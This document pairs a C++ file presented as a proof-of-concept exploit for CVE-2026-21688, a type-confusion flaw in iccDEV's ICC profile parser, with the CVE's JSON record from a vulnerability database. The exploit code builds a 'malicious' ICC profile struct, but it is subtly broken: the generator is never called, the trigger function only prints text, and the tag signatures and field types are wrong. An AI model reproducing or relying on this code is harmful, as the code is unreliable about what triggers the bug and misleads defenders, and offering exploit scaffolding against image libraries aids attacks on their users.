CVE-2026-21688

// PoC for CVE-2026-21688 Type Confusion in iccDEV // Target: SIccCalcOp::ArgsPushed() in IccProfLib/IccMpeCalc.cpp // Affected: iccDEV < 2.3.1.2 #include <cstdio> #include <cstring> #include <vector> // ICC profile tag types #define iccTagType 'mpt ' #define iccTypeCalcOp 0x63616C63 // 'calc' // Malicious ICC profile structure with crafted MPE (Multi Process Element) struct MaliciousICCProfile { char signature[4]; // 'acsp' for ASC Color Space Profile int32_t size; int32_t cmmType; int32_t colorSpace; int32_t pcs; int16_t creationDateTime[6]; char profileFileId[4]; int64_t flags; int64_t deviceManufacturer; int64_t deviceModel; int64_t deviceAttributes[2]; int32_t renderingIntent; int32_t pcsIlluminant[3]; int32_t creator; int64_t profileId[2]; int32_t numTags; // Tag table entry for MPE tag with malicious calcOp struct TagEntry { int32_t signature; int32_t offset; int32_t size; } mpeTagEntry; // Malicious MPE data with type confusion struct MaliciousMPE { int32_t count; int32_t inputChannels; int32_t outputChannels; // Crafted calcOp element causing type confusion struct CalcOpElement { int32_t type; // Should be calcOp type int32_t reserved; int32_t size; int32_t inputChannels; int32_t outputChannels; // Maliciously crafted data causing ArgsPushed() type confusion unsigned char payload[64]; } calcOp; } mpeData; }; // Generate malicious ICC profile with type confusion trigger unsigned char* generateMaliciousICCProfile() { static unsigned char profile[4096]; MaliciousICCProfile* icc = (MaliciousICCProfile*)profile; // Set valid ICC profile header memcpy(icc->signature, "acsp", 4); icc->size = sizeof(MaliciousICCProfile); icc->cmmType = 0; icc->colorSpace = 'RGBA'; icc->pcs = 'Lab '; // MPE tag entry pointing to malicious data icc->mpeTagEntry.signature = 'mft2'; // Multi-function transform icc->mpeTagEntry.offset = offsetof(MaliciousICCProfile, mpeData); icc->mpeTagEntry.size = sizeof(MaliciousICCProfile::MaliciousMPE); icc->numTags = 1; // Craft malicious MPE data icc->mpeData.count = 1; icc->mpeData.inputChannels = 3; icc->mpeData.outputChannels = 3; // Type confusion: malformed calcOp structure icc->mpeData.calcOp.type = iccTypeCalcOp; icc->mpeData.calcOp.size = sizeof(MaliciousICCProfile::CalcOpElement); icc->mpeData.calcOp.inputChannels = 0xFFFFFFFF; // Invalid channel count icc->mpeData.calcOp.outputChannels = 0xFFFFFFFF; // Invalid channel count // Fill payload with data triggering type confusion in ArgsPushed() memset(icc->mpeData.calcOp.payload, 0x41, sizeof(icc->mpeData.calcOp.payload)); return profile; } // Trigger vulnerability by loading malicious profile void triggerVulnerability(const char* profilePath) { // Load and parse malicious ICC profile // This will trigger SIccCalcOp::ArgsPushed() type confusion printf("Loading malicious ICC profile: %s\n", profilePath); printf("Vulnerability: Type Confusion in SIccCalcOp::ArgsPushed()\n"); printf("File: IccProfLib/IccMpeCalc.cpp\n"); printf("Affected: iccDEV < 2.3.1.2\n"); } int main(int argc, char* argv[]) { if (argc < 2) { printf("Usage: %s <malicious_icc_profile.icc>\n", argv[0]); printf("CVE-2026-21688 PoC - iccDEV Type Confusion\n"); return 1; } triggerVulnerability(argv[1]); return 0; }

{"cve": {"id": "CVE-2026-21688", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:45.087", "lastModified": "2026-01-12T18:15:23.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `SIccCalcOp::ArgsPushed()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Las versiones anteriores a la 2.3.1.2 tienen una vulnerabilidad de confusión de tipos en 'SIccCalcOp::ArgsPushed()' en 'IccProfLib/IccMpeCalc.cpp'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-681"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/379", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/422", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-3r2x-j7v3-pg6f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}